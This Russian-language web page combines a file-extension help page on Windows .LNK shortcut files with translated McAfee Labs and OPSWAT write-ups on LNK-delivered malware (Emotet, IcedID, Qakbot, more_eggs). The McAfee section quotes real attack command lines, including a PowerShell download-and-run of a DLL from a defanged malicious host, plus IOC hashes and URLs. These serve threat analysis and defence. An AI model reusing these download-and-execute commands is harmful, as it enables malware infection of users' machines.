Lnk это что: Расширение файлов LNK

Содержание

Как открыть файл LNK? Расширение файла .LNK

Windows Format Shortcut

  • Developer


    Microsoft

  • Category


    Системные файлы

  • Популярность

    3.9 (92 votes)

Что такое файл LNK?

Файлы с расширением LNK — это файлы ярлыков, используемые в системе Windows. Содержит информацию о типе и местоположении (идентификатор URI или GIUD соответствующего файла) соответствующего файла, а также о связанной программе.

Файлы LNK могут содержать дополнительную пользовательскую информацию. Если они связаны с приложением EXE, они могут также указывать начальные атрибуты программы, к которой они относятся. В системе Windows файлы LNK имеют такой же значок, что и соответствующие файлы. Расширение LNK невидимо в имени файла, по умолчанию.

Ярлык файла LNK не работает

Изменение некоторых параметров соответствующего файла, таких как имя или местоположение, приводит к отключению всех файлов ярлыков, ведущих к ним. Изменения в системе ссылок, внесенные пользователем, могут привести к исчезновению ярлыков на рабочем столе. В этом случае пользователь должен обратиться к инструкциям в справочном центре Windows.

Программы, которые поддерживают LNK расширение файла

Следующий список содержит программы, сгруппированные по 3 операционным системам, которые поддерживают LNK файлы. LNK файлы можно встретить на всех системных платформах, включая мобильные, но нет гарантии, что каждый из них будет должным образом поддерживать такие файлы.

Программы, обслуживающие файл LNK


Windows




  • Microsoft Windows


MAC OS




  • Parallels Desktop


Linux




  • CrossOver

Updated: 09/02/2019

Как открыть файл LNK?

Причин, по которым у вас возникают проблемы с открытием файлов LNK в данной системе, может быть несколько. К счастью, наиболее распространенные проблемы с файлами LNK могут быть решены без глубоких знаний в области ИТ, а главное, за считанные минуты. Мы подготовили список, который поможет вам решить ваши проблемы с файлами LNK.

Шаг 1. Скачайте и установите Microsoft Windows


Наиболее распространенной причиной таких проблем является отсутствие соответствующих приложений, поддерживающих файлы LNK, установленные в системе. Этот легкий. Выберите Microsoft Windows или одну из рекомендованных программ (например, Parallels Desktop, CrossOver) и загрузите ее из соответствующего источника и установите в своей системе. В верхней части страницы находится список всех программ, сгруппированных по поддерживаемым операционным системам. Одним из наиболее безопасных способов загрузки программного обеспечения является использование ссылок официальных дистрибьюторов. Посетите сайт Microsoft Windows и загрузите установщик.

Шаг 2. Проверьте версию Microsoft Windows и обновите при необходимости

Если проблемы с открытием файлов LNK по-прежнему возникают даже после установки Microsoft Windows, возможно, у вас устаревшая версия программного обеспечения. Проверьте веб-сайт разработчика, доступна ли более новая версия Microsoft Windows. Иногда разработчики программного обеспечения вводят новые форматы вместо уже поддерживаемых вместе с новыми версиями своих приложений. Если у вас установлена более старая версия Microsoft Windows, она может не поддерживать формат LNK. Все форматы файлов, которые прекрасно обрабатывались предыдущими версиями данной программы, также должны быть открыты с помощью Microsoft Windows.

Шаг 3. Настройте приложение по умолчанию для открытия LNK файлов на Microsoft Windows

Если у вас установлена последняя версия Microsoft Windows и проблема сохраняется, выберите ее в качестве программы по умолчанию, которая будет использоваться для управления LNK на вашем устройстве. Следующий шаг не должен создавать проблем. Процедура проста и в значительной степени не зависит от системы


Процедура изменения программы по умолчанию в Windows

  • Нажатие правой кнопки мыши на LNK откроет меню, из которого вы должны выбрать опцию Открыть с помощью
  • Выберите Выбрать другое приложение → Еще приложения
  • Чтобы завершить процесс, выберите Найти другое приложение на этом. .. и с помощью проводника выберите папку Microsoft Windows. Подтвердите, Всегда использовать это приложение для открытия LNK файлы и нажав кнопку OK .


Процедура изменения программы по умолчанию в Mac OS

  • В раскрывающемся меню, нажав на файл с расширением LNK, выберите Информация
  • Откройте раздел Открыть с помощью, щелкнув его название
  • Выберите Microsoft Windows и нажмите Изменить для всех …
  • Если вы выполнили предыдущие шаги, должно появиться сообщение: Это изменение будет применено ко всем файлам с расширением LNK. Затем нажмите кнопку Вперед», чтобы завершить процесс.

Шаг 4. Убедитесь, что файл LNK заполнен и не содержит ошибок

Если проблема по-прежнему возникает после выполнения шагов 1-3, проверьте, является ли файл LNK действительным. Вероятно, файл поврежден и, следовательно, недоступен.

1. Убедитесь, что LNK не заражен компьютерным вирусом

Если LNK действительно заражен, возможно, вредоносное ПО блокирует его открытие. Немедленно просканируйте файл с помощью антивирусного инструмента или просмотрите всю систему, чтобы убедиться, что вся система безопасна. Если сканер обнаружил, что файл LNK небезопасен, действуйте в соответствии с инструкциями антивирусной программы для нейтрализации угрозы.

2. Убедитесь, что файл с расширением LNK завершен и не содержит ошибок

Вы получили LNK файл от другого человека? Попросите его / ее отправить еще раз. Возможно, что файл не был должным образом скопирован в хранилище данных и является неполным и поэтому не может быть открыт. Если файл LNK был загружен из Интернета только частично, попробуйте загрузить его заново.

3. Проверьте, есть ли у вашей учетной записи административные права

Некоторые файлы требуют повышенных прав доступа для их открытия. Выйдите из своей текущей учетной записи и войдите в учетную запись с достаточными правами доступа. Затем откройте файл Windows Format Shortcut.

4. Убедитесь, что ваше устройство соответствует требованиям для возможности открытия Microsoft Windows

Если в системе недостаточно ресурсов для открытия файлов LNK, попробуйте закрыть все запущенные в данный момент приложения и повторите попытку.

5. Проверьте, есть ли у вас последние обновления операционной системы и драйверов

Последние версии программ и драйверов могут помочь вам решить проблемы с файлами Windows Format Shortcut и обеспечить безопасность вашего устройства и операционной системы. Возможно, что одно из доступных обновлений системы или драйверов может решить проблемы с файлами LNK, влияющими на более старые версии данного программного обеспечения.

Вы хотите помочь?

Если у Вас есть дополнительная информация о расширение файла LNK мы будем признательны, если Вы поделитесь ею с пользователями нашего сайта. Воспользуйтесь формуляром, находящимся здесь и отправьте нам свою информацию о файле LNK.

Что это и как его открыть?

Автор: Jay Geater   |   Последнее обновление: December 05, 2018

Резюме файла LNK

Согласно нашим записям, существуют два тип(ы) файлов, связанных с расширением LNK, самый популярный из которых отформатирован в качестве Windows File Shortcut. Самое распространенное связанное приложение — Microsoft Windows, выпущенное Microsoft Corporation. Кроме того, два различные программы позволяют вам просматривать эти файлы.
Чаще всего файлы LNK классифицируют, как System Files. Другие типы файлов могут относиться к Database Files.

Расширение файла LNK можно просмотреть в Windows, Mac и Linux. Они поддерживаются в основном настольными компьютерами и некоторыми мобильными платформами.

Рейтинг популярности основного типа файла LNK составляет «Низкий», что означает, что эти файлы встречаются на стандартных настольных комьютерах или мобильных устройствах достаточно редко.

Интересно узнать больше о расширении файла LNK? Для того, чтобы узнать о программе, открывающей файлы LNK, а также ознакомиться с другими советами по устранению неполадок, рекомендуется обратиться к подробной информации о файле, представленной ниже.

Популярность типов файлов
Рейтинг

/ 11690

Активность

Важность
5

December

2018

Редактировано

Откройте файлы в %%os%% с помощью средства для просмотра файлов FileViewPro

Продукт Solvusoft

Скачать бесплатно

Установить необязательные продукты — FileViewPro (Solvusoft) | Лицензия | Политика защиты личных сведений | Условия | Удаление

Сортировка LNK-файлов

 
2 существующих типов файлов используют это расширение

Ведущий тип LNK

.LNK

Расширение: . lnk
Класс: Windows File Shortcut

Файл LNK это ярлык, который представляет собой ссылку на исходный файл. Он содержит целевой тип, местоположение, имя файл, программу, которая открывает его, и опциональные сочетание клавиш.

Организация: Microsoft Corporation
Дивизион: Системные файлы
Папка: HKEY_CLASSES_ROOT\.lnk

Программные обеспечения, открывающие Windows File Shortcut:

Microsoft Windows, разработчик — Microsoft Corporation

Windows

Parallels Desktop for Mac, разработчик — Parallels

Mac

HxD, разработчик — Open Source

Windows

CrossOver, разработчик — Codeweavers

Mac
Linux

lnkedit, разработчик — Open Source

Windows

Альтернативные типы LNK

. LNK

Расширение: .lnk
Класс: Advanced Revelation Database File

Файл базы данных, созданный OpenInsight, программное обеспечение разработки баз данных для операционной системы Microsoft Windows, разработанного Откровении.

Организация: Revelation Software
Дивизион: Файлы баз данных

Программы, открывающие файлы Advanced Revelation Database File :

OpenInsight, разработчик — Revelation Software

Совместимый с:

Windows

Установить необязательные продукты — FileViewPro (Solvusoft) | Лицензия | Политика защиты личных сведений | Условия | Удаление

Поиск файлов

Иерархия ОС
7 (45. 73%)
10 (44.56%)
8.1 (5.41%)
XP (2.79%)
8 (0.97%)

Источники проблем с LNK

Проблемные проблемы с открытием LNK-файлов

Microsoft Windows нет

При попытке открыть файл LNK вы получаете сообщение об ошибке «Не удается открыть тип файла LNK». Обычно это означает, что Microsoft Windows не установлен в %%os%%. Типичный путь открытия документа LNK двойным щелчком не будет работать, так как %%os%% не может установить подключение к программе.

Наконечник: Если у вас не установлен Microsoft Windows, и вы знаете другую программу, чтобы открыть файл LNK, вы можете попробовать открыть его, выбрав из программ, перечисленных в разделе «Показать приложения».

Microsoft Windows требует обновления

В других случаях версия файла Windows File Shortcut может не поддерживаться вашей версией Microsoft Windows. Загрузите последнюю версию Microsoft Windows с веб-сайта Microsoft Corporation, чтобы убедиться, что у вас установлена правильная версия. Эта проблема в основном возникает, когда файл Windows File Shortcut был создан более новой версией Microsoft Windows, чем на компьютере.

Совет: Иногда вы можете получить подсказку о версии LNK-файла, который у вас есть, щелкнув правой кнопкой мыши на файле, а затем нажав на «Свойства» (Windows) или «Получить информацию» (Mac OSX).

В конечном счете, большинство трудностей при открытии LNK-файлов связаны с установленной неправильной версией Microsoft Windows.

Другие причины проблем при открытии LNK-файлов

Вы по-прежнему можете испытывать ошибки при открытии LNK-файлов даже с последней версией Microsoft Windows, установленной на вашем компьютере. Другие ошибки открытия LNK могут быть созданы другими системными проблемами внутри %%os%%. Другие причины, способствующие этому:

  • Тип файла LNK Неверные записи реестра
  • Описание LNK-файла в реестре Windows было удалено
  • Поврежденная установка Microsoft Windows или другой программы, связанной с LNK
  • Повреждение файла, влияющее на LNK-файл
  • На ваш документ LNK негативно повлияли вредоносные программы
  • Оборудование, связанное с LNK, имеет устаревшие драйверы устройств
  • Windows не может загрузить файл электронной Windows File Shortcut из-за нехватки ресурсов (например, БАРАН)
Викторина: Какое из существующих расширений файлов является самым старым?

DOC
GIF
JPG
PDF
TXT

Как исправить проблемы с открытием файлов LNK

Установить необязательные продукты — FileViewPro (Solvusoft) | Лицензия | Политика защиты личных сведений | Условия | Удаление

Расширение файла  
# A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

Rise of LNK (файлы ярлыков) Вредоносное ПО

Автор Lakshya Mathur

Файл LNK — это ярлык Windows, который служит указателем для открытия файла, папки или приложения. Файлы LNK основаны на формате двоичных файлов Shell Link, который содержит информацию, используемую для доступа к другому объекту данных. Эти файлы можно создать вручную, используя стандартную опцию создания ярлыка правой кнопкой мыши, или иногда они создаются автоматически при запуске приложения. Существует также множество инструментов для создания LNK-файлов, также многие люди создали инструменты «lnkbombs» специально для вредоносных целей.

Во втором квартале 2022 года McAfee Labs зафиксировала рост числа вредоносных программ, доставляемых с использованием файлов LNK. Злоумышленники используют простоту LNK и используют его для доставки вредоносных программ, таких как Emotet, Qakbot, IcedID, Bazarloaders и т. д.

используются для доставки таких вредоносных программ, как Emotet, Qakbot и IcedID.

Ниже приведен скриншот того, как эти ярлыки выглядят для обычного пользователя.

Рисунок 2. Файлы LNK, видимые обычному пользователю

АНАЛИЗ УГРОЗ LNK И КАМПАНИИ

Благодаря отключению Microsoft офисных макросов по умолчанию злоумышленники совершенствуют свои методы приманки, включая использование файлов LNK для достижения своих целей.

Злоумышленники используют спам в электронной почте и вредоносные URL-адреса для доставки файлов LNK жертвам. Эти файлы предписывают законным приложениям, таким как PowerShell, CMD и MSHTA, загружать вредоносные файлы.

Мы рассмотрим три недавние вредоносные кампании Emotet, IcedID и Qakbot, чтобы увидеть, насколько опасными могут быть эти файлы.

EMOTET

Инфекционная цепь

Рисунок 3 _EMOTET, доставленная с помощью LNK Файл-цепь

Анализ угрозы

Рисунок 40013 Пользователь. может увидеть сообщение-приманку и прикрепленный вредоносный LNK-файл.

Пользователь заражается при ручном доступе к прикрепленному LNK-файлу. Чтобы копнуть глубже, мы видим свойства LNK-файла:

Рисунок 5 _Свойства образца Emotet LNK

Как видно на рисунке 5, целевая часть показывает, что LNK вызывает процессор команд Windows (cmd.exe). Целевой путь, указанный в свойствах, виден только до 255 символов. Однако аргументы командной строки могут быть до 4096, поэтому злоумышленники могут использовать это преимущество и передавать длинные аргументы, поскольку они не будут видны в свойствах.

В нашем случае аргументом является /v:on /c findstr «glKmfOKnQLYKnNs.*» «Форма 25.04.2022, US.lnk» > «%tmp%\YlScZcZKeP.vbs» & «%tmp%\YlScZcZKeP.vbs»

Рисунок 6 _ Содержимое LNK-файла Emotet

Как только утилита findstr.exe получает указанную строку, остальная часть содержимого LNK-файла сохраняется в файле .VBS в папке %temp% со случайным именем YIScZcZKeP.vbs

Следующая часть команды cmd.exe вызывает файл VBS с помощью хоста сценариев Windows (wscript.exe) для загрузки основной 64-разрядной полезной нагрузки Emotet DLL.

Загруженная DLL затем наконец выполняется с помощью утилиты REGSVR32.EXE, поведение которой аналогично версии emotet на основе Excel (.xls).

ICEDID

Инфекционная цепь

Рисунок 7 _ Icedid, доставленная с помощью цепочки инфекции LNK

Анализ угроз

. Эта атака является идеальным примером. Утилиты МШТА нацелены на своих жертв.

Здесь PowerShell LNK имеет сильно запутанный параметр, который можно увидеть на Рис. 8. Целевая часть свойств LNK

Рис. 8 _ Свойства IcedID LNK образца

Параметр слишком длинный и не полностью виден в целевой части. Весь запутанный аргумент расшифровывается во время выполнения, а затем выполняется MSHTA с аргументом hxxps://hectorcalle[.]com/093789.hta.

Загруженный файл HTA вызывает другой PowerShell с аналогичным запутанным параметром, но он подключается к Uri hxxps://hectorcalle[.]com/listbul.exe

Uri загружает 64-разрядную полезную нагрузку EXE установщика IcedID под Папка ГЛАВНАЯ%.

КАКБОТ

Infection-Chain

и загрузите полезные нагрузки основных угроз.

Рисунок 10 _ Свойства Qakbot LNK образца

На рисунке 10 полный аргумент целевой части: «C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[. ]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr»

Когда этот LNK PowerShell вызывается, он подключается к hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png с помощью команды Invoke-WebRequest, а файл загрузки сохраняется в папке %temp% с именем test.dll

Это основная полезная нагрузка Qakbot DLL, которая затем выполняется с помощью утилиты rundll32.

ЗАКЛЮЧЕНИЕ

Как мы видели в трех вышеупомянутых кампаниях угроз, понятно, что злоумышленники злоупотребляют LNK-файлами ярлыков Windows и делают их чрезвычайно опасными для обычных пользователей. LNK в сочетании с PowerShell, CMD, MSHTA и т. д. может нанести серьезный ущерб машине жертвы. Обычно считается, что вредоносные LNK используют PowerShell и CMD, с помощью которых они могут подключаться к вредоносным URL-адресам для загрузки вредоносных полезных данных.

Здесь мы рассмотрели только три семейства угроз, но эти файлы были замечены при использовании других утилит Windows для доставки различных типов вредоносных полезных нагрузок. Эти типы атак все еще развиваются, поэтому каждый пользователь должен проводить тщательную проверку при использовании файлов ярлыков LNK. Потребители должны поддерживать свою операционную систему и антивирус в актуальном состоянии. Им следует остерегаться фишинговой почты и переходов по вредоносным ссылкам и вложениям.

IOC (Индикаторы компрометации)

Тип ША-256 Сканер  
Эмотет ЛНК 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 ВСС LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 ВСС LNK/Агент-FTA

Подозрительный ZIP!lnk

Какбот ЛНК b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 ВСС LNK/Агент-TSR

 

URL-адреса (унифицированный указатель ресурсов) hxxps://creemo[. ]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/

hxxp://filmmogzivota[.]rs/SpryAssets/gDR/

hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/

hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/

hxxp://cipro[.]mx/prensa/siZP69рБФмибДвуТП1/

hxxps://hectorcalle[.]com/093789.hta

hxxps://hectorcalle[.]com/listbul.exe

hxxps://green-a-thon[.]com/LosZkUvr/B.png

WebAdvisor Все URL заблокированы

 

McAfee Labs — один из ведущих источников информации об угрозах, информации об угрозах и передовых идей в области кибербезопасности. Смотрите наши сообщения в блоге ниже для получения дополнительной информации.

Ярлыки LNK-файлы могут содержать вредоносное ПО

07 мая 2021 г. | опубликовано Vinh Lam, старшим менеджером технических программ

Как вредоносное ПО может быть скрыто в файлах LNK и как организации могут защитить себя.

Киберпреступники всегда ищут инновационные методы для атак на системы безопасности. Чем незаметнее вредоносное ПО, тем сложнее его обнаружить и удалить. Злоумышленники используют эту тактику, чтобы вставить трудно обнаруживаемое вредоносное ПО в файлы ярлыков (файлы LNK), превращая надежное приложение в опасную угрозу.

Менее месяца назад в LinkedIn началась новая фишинговая кампания, нацеленная на профессионалов с помощью сложного троянского бэкдора под названием «more_eggs», скрытого в предложении о работе.

Кандидаты в LinkedIn получили вредоносные архивные ZIP-файлы с названиями должностей жертв в своих профилях LinkedIn. Когда жертвы открывали поддельные предложения о работе, они неосознанно инициировали скрытую установку безфайлового бэкдора «more_eggs». После установки на устройство сложный бэкдор может получить больше вредоносных плагинов и предоставить хакерам доступ к компьютерам жертв.

После того, как троян окажется в компьютерной системе, злоумышленники могут проникнуть в систему и заразить ее другими типами вредоносного ПО, например программами-вымогателями, красть или эксфильтровать данные. Golden Eggs, группа угроз, стоящая за этим вредоносным ПО, продавала его как MaaS (Malware-as-a-Service) для своих клиентов.

Что такое файлы LNK?

LNK — это расширение имени файла для ярлыков к локальным файлам в Windows. Ярлыки файлов LNK обеспечивают быстрый доступ к исполняемым файлам (.exe) без использования пользователем полного пути к программе.

Файлы в формате двоичных файлов Shell Link (.LNK) содержат метаданные об исполняемом файле, включая исходный путь к целевому приложению.

Windows использует эти данные для поддержки запуска приложений, связывания сценариев и сохранения ссылок приложений на целевой файл.

Все мы используем LNK-файлы в качестве ярлыков на рабочем столе, в панели управления, в меню задач и в проводнике Windows.

В вашем самом слабом LNK может скрываться вредоносное ПО

Поскольку файлы LNK представляют собой удобную альтернативу открытию файла, злоумышленники могут использовать их для создания угроз на основе сценариев. Один из этих методов — использование PowerShell.

PowerShell — это надежный язык сценариев командной строки и оболочки, разработанный Microsoft. Поскольку PowerShell незаметно работает в фоновом режиме, это дает хакерам прекрасную возможность вставить вредоносный код. Многие киберпреступники воспользовались этим, выполняя сценарии PowerShell в файлах LNK.

Этот сценарий атаки не нов. Эксплойты LNK-файлов были широко распространены еще в 2013 году и до сих пор остаются активной угрозой. Некоторые недавние сценарии включают использование этого метода для внедрения вредоносного ПО в COVID-19.или прикрепите ZIP-файл с замаскированным вирусом PowerShell к фишинговому письму.

Как киберпреступники используют файлы LNK в злонамеренных целях

Злоумышленники могут внедрить вредоносный сценарий в команду PowerShell по целевому пути файла LNK.

В некоторых случаях вы можете увидеть код в свойствах Windows:

Но иногда трудно определить проблему:

URL-адрес пути выглядит безобидным. Однако после командной строки (cmd.exe) есть строка пробелов. Поскольку поле «Цель» имеет ограничение в 260 символов, вы можете увидеть только полную команду в инструменте анализа LNK. Вредоносный код был незаметно вставлен после пробелов:

Как только пользователь открывает LNK-файл, вредоносное ПО заражает его компьютер, причем в большинстве случаев пользователь даже не подозревает, что что-то не так.

Как OPSWAT Deep CDR может предотвратить атаки на LNK-файлы

OPSWAT Deep CDR (разоружение и реконструкция содержимого) защищает ваши организации от потенциальных угроз, скрытых внутри файлов. Наша технология предотвращения угроз предполагает, что все файлы, попадающие в вашу сеть, являются вредоносными; затем деконструирует, очищает и перестраивает каждый файл, удаляя все подозрительное содержимое.

Deep CDR удаляет все вредоносные команды cmd.exe и powershell.exe, присутствующие в файлах LNK. В приведенном выше примере троянца в предложении о работе LinkedIn зараженный файл LNK был скрыт в ZIP-файле.